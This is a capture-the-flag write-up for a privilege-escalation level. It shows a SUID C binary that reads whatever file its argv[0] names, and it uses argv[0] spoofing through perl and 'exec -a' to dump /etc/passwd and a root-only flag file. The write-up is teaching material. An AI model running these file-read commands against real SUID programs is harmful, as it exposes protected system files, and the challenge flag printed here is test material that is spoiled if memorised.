🔑 Privesc - 2

👀 Before you start

You can donate to me via Buy Me a Coffee or follow me on Github

🚩 Getting the Flag

We come to a challenge where we have this :

level2@Midnight:~$ ls -la
total 16
drwxr-xr-x 2 root  root  4096 Mar 15  2024 .
drwxr-xr-x 3 root  root  4096 Mar 15  2024 ..
-rwsr-xr-x 1 root level2 7320 Mar 15  2024 privesc2
-rwxr--r-- 1 root level2 7320 Mar 15  2024 privesc2.c

We have an interesting binary with suid and s rights for the level2 group. From what we have, we also have the binary's source code.

level2@Midnight:~$ cat privesc2.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    FILE *f = fopen(argv[0], "rb");
    char buf[64] = { 0 };

    if (f == NULL) {
        printf("Error\n");
        return 1;
    }

    fread(buf, 1, 64, f);
    printf("%s\n", buf);
    fclose(f);
}

Okay, now we see the vulnerability of the binary. Let me guide you a little in solving this challenge.

In fact, the problem lies in calling fopen with the program's first argument. In effect, the program opens the file passed as an argument and reads it. We can therefore read any file on the system. If we pass it to argv[0].

For example, if we do this:

level2@Midnight:~$ perl -e 'exec {shift} @ARGV' ./privesc2 /etc/passwd

We can now read the /etc/passwd file.

Here is an example:

level2@Midnight:~$ perl -e 'exec {shift} @ARGV' ./privesc2 /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:102:105::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:103:106:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
syslog:x:104:111::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:107:113::/nonexistent:/usr/sbin/nologin
level2:x:1001:1001:level2,,,:/home/level2:/bin/bash

🌟 Tip

If you don't have perl you can also use exec:

level2@Midnight:~$ exec -a /etc/passwd ./privesc2

We can then use this little technique to get the flag.

level2@Midnight:~$ perl -e 'exec {shift} @ARGV' ./privesc2 /root/flag.txt
MCTF{GGWPGA2RgyfOYZKukWQuaf4K36iPQDr}

💖 Support

👀 Before you leave